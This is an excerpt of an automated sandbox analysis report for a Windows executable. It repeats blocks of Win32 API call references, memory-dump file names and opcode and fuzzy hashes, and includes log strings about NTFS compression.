                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString$FileMessageModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 704749118-0
                                                                                        • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                        • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                          • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                          • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                        • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                        • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                        • String ID:
                                                                                        • API String ID: 855768636-0
                                                                                        • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                        • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 177026234-0
                                                                                        • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                        • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 00417260
                                                                                        • SetCursor.USER32(00000000), ref: 004172A3
                                                                                        • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                        • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1959210111-0
                                                                                        • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                        • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                        • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                        • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                        • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4025006896-0
                                                                                        • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                        • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                        • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                        • String ID:
                                                                                        • API String ID: 4071923889-0
                                                                                        • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                        • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                        • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                        • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                        • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                        • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,|0e,?,?,?,004018B4), ref: 00401566
                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,|0e,?,?,?,004018B4), ref: 0040158B
                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,|0e,?,?,?,004018B4), ref: 004015B1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Alloc$Free
                                                                                        • String ID: |0e
                                                                                        • API String ID: 3668210933-1077209858
                                                                                        • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                        • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                                        • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                        • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                        Strings
                                                                                        • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                        • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                        • API String ID: 1452528299-3038984924
                                                                                        • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                        • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                        Strings
                                                                                        • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                        • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                        • API String ID: 1452528299-1392080489
                                                                                        • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                        • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                        • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                        • String ID:
                                                                                        • API String ID: 4283692357-0
                                                                                        • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                        • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                        • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                        • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CountSleepTick
                                                                                        • String ID:
                                                                                        • API String ID: 2227064392-0
                                                                                        • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                        • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                        • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                        • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                        • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                        • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                        • String ID:
                                                                                        • API String ID: 215268677-0
                                                                                        • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                        • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                        • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                        • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                        APIs
                                                                                        • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                        • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                        • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                        • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                        • String ID:
                                                                                        • API String ID: 2280970139-0
                                                                                        • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                        • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                        • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                        • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                        APIs
                                                                                        • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                        • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3554983010.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3554957587.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555057788.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555076842.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555094183.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555110326.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_EQ5Vcf19u8.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocHandleLockUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 2167344118-0
